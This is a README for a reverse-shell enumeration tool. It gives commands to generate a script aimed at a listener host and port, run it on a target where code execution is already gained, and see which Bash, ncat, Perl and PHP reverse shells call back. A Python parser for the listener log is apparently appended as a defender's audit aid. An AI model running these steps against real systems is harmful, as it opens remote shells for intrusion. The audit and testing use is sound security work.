fx2301

Reverse Shell Enumeration

Why?

You're a defender who wants to audit which reverse shells work out of the box on a particular host. Or you're a lazy attacker who wants to quickly determine which reverse shells will work.

When?

You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.

How?

1. Clone the repo:

```
git clone https://github.com/fx2301/reverseshellenum.git
cd reverseshellenum
```

2. Generate yourself a fresh script:

```
LHOST="10.10.0.123" LPORT=31373 python3 generate.py
```

3. Run the listener:

```
./listen.sh
```

4. Run the reverse shell enumerator on the target host:

```
./reverseshellenum.sh
```

5. Observe which shells work (refer to shells.json):

```
$ ./listen.sh
[i] Starting Reverse Shell Audit
  [+] Success: Bash -i
  [+] Success: Bash 196
  [+] Success: Bash read line
  [+] Success: Bash 5
  [+] Success: ncat -e
  [+] Success: Perl
  [+] Success: Perl no sh
  [+] Success: PHP Emoji
[i] Ending Reverse Shell Audit
```
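For the defender's audit use case, the listener output can be reduced to the interpreters and binaries that actually produced a callback, which is the list to review for removal or egress restriction. This is an added example, not code from the reverseshellenum repo; it assumes the output format shown in the post and that the first word of each entry names the interpreter or binary, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample: the listener output as shown in the post.
SAMPLE = """\
[i] Starting Reverse Shell Audit
  [+] Success: Bash -i
  [+] Success: Bash 196
  [+] Success: Bash read line
  [+] Success: Bash 5
  [+] Success: ncat -e
  [+] Success: Perl
  [+] Success: Perl no sh
  [+] Success: PHP Emoji
[i] Ending Reverse Shell Audit
"""
SUCCESS = re.compile(r"^\s*\[\+\] Success: (?P<name>.+?)\s*$")

def parse_audit(text):
    """Return (successes, complete, unparsed) for one listener log."""
    successes, unparsed = [], []
    started = ended = False
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("$"):
            continue  # blank lines and the shell prompt line
        if stripped == "[i] Starting Reverse Shell Audit":
            started, ended = True, False
        elif stripped == "[i] Ending Reverse Shell Audit":
            ended = True
        elif started and not ended and SUCCESS.match(line):
            successes.append(SUCCESS.match(line).group("name"))
        else:
            unparsed.append(line)  # keep anything unexpected for manual review
    return successes, started and ended, unparsed

def by_family(successes):
    """Group entries by first word (assumption: it names the interpreter/binary)."""
    groups = defaultdict(list)
    for name in successes:
        groups[name.split()[0].lower()].append(name)
    return dict(groups)

def report(text):
    successes, complete, unparsed = parse_audit(text)
    ranked = sorted(by_family(successes).items(), key=lambda kv: (-len(kv[1]), kv[0]))
    lines = [f"{fam}: {len(names)} working ({', '.join(names)})" for fam, names in ranked]
    if not complete:
        lines.append("WARNING: no end marker seen; the audit may be incomplete")
    if unparsed:
        lines.append(f"NOTE: {len(unparsed)} unrecognised line(s) need manual review")
    return "\n".join(lines)

if __name__ == "__main__":
    print(report(SAMPLE))
```

A log without the closing `[i] Ending Reverse Shell Audit` line is reported as possibly incomplete, so an interrupted listener is not mistaken for a clean result.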

PRs welcome! Kudos to revshells.com for the raw material.
